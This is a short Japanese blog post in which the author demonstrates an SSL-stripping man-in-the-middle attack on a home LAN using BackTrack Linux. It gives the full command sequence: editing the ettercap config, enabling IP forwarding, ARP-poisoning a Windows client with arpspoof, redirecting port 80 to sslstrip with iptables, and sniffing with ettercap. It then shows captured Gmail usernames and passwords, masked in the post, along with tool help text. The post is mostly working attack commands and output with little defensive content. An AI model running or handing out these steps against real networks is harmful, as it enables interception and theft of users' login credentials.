lost and found ( for me ? )

Analyze ( strip ? ) SSL Traffic with sslstrip , arpspoof and ettercap

SSL通信の解読に ssldump を使ってたけど、なんか他にいいツールないかなーとさがしていた。。。
sslstrip , arpspoof , ettercap を使ってSSL通信を解読してみた。

SSLクライアント: 192.168.1.2 ( Windows )
sslstrip , arpspoof , ettercap マシン: 192.168.1.3 ( BackTrack Linux 4 final )

Internet --- Router 1.254  --- 1.3 Windows
                                   --- 1.2  eth0  BackTrack Linux 

[ sslstrip マシン ]

下記2行のコメントを外す

- ethercap の設定ファイルを修正

ettercap  NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks


root@bt:# vi /etc/etter.conf

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

- forwarding を有効にする

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1


- arpspoof を実行

arpspoof -t ターゲットのIP デフォルト  ゲートウェイ

root@bt:~# arpspoof -i eth0 -t 192.168.1.2 192.168.1.254


OPTIONS
       -i interface
              Specify the interface to use.

       -t target
              Specify a particular host to ARP poison (if not specified, all  hosts  on
              the LAN).

       host   Specify  the  host  you  wish to intercept packets for (usually the local
              gateway).


- あて先ポートが 80 を 10000 ポートにリダイレクト ( sslstrip が 10000 番ポートでリッスンしていて、SSLトラフィックを strip する )

root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

sslstrip 起動

root@bt:~# sslstrip -a -f -k

sslstrip 0.6 by Moxie Marlinspike running...

- sslstrip は 10000番ポートでリッスン

root@bt:~# lsof -i:10000
COMMAND   PID USER   FD   TYPE DEVICE SIZE NODE NAME
sslstrip 6188 root    4u  IPv4  23821       TCP *:webmin (LISTEN)


root@bt:~# sslstrip --help

sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip

Options:
-w , --write= Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l , --listen=        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

- パケットキャプチャ

root@bt:~# ettercap -T -q -i eth0


Windows ( IE ) で、gmail にログイン。

ユーザ名、パスワードがみえる。  ( sslsttrip マシン )

root@bt:~# ettercap -T -q -i eth0

HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com  PASS: xxxxx  INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com  PASS: xxxxx  INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx

html 形式でみることもできる ( -V html )

root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE

GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP



-V, --visual
              Use this option to set the visualization method for the  packets
              to be displayed.

              FORMAT may be one of the following:



              hex    Print the packets in hex format.

                     example:

                     the string  "HTTP/1.1 304 Not Modified"  becomes:

                     0000:  4854  5450 2f31 2e31 2033 3034 204e 6f74  HTTP/1.1
                     304 Not
                     0010: 204d 6f64 6966 6965 64                    Modified


              ascii  Print only "printable" characters, the  others  are  dis-
                     played as dots '.'


              text   Print  only  the "printable" characters and skip the oth-
                     ers.


              ebcdic Convert an EBCDIC text to ASCII.


              html   Strip all the html tags from the text.  A  tag  is  every
                     string between < and >.

                     example:

                     ,  but  the  following
                     will not be displayed.

                     This is the title, but the following  will  not  be  dis-
                     played.


              utf8   Print  the  packets  in  UTF-8  format. The encoding used
                     while  performing  the  conversion  is  declared  in  the
                     etter.conf(5) file.

トリックは中間者攻撃 ( Man in The Middle Attack ) で SSL通信をぬすんで、解読してる。

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.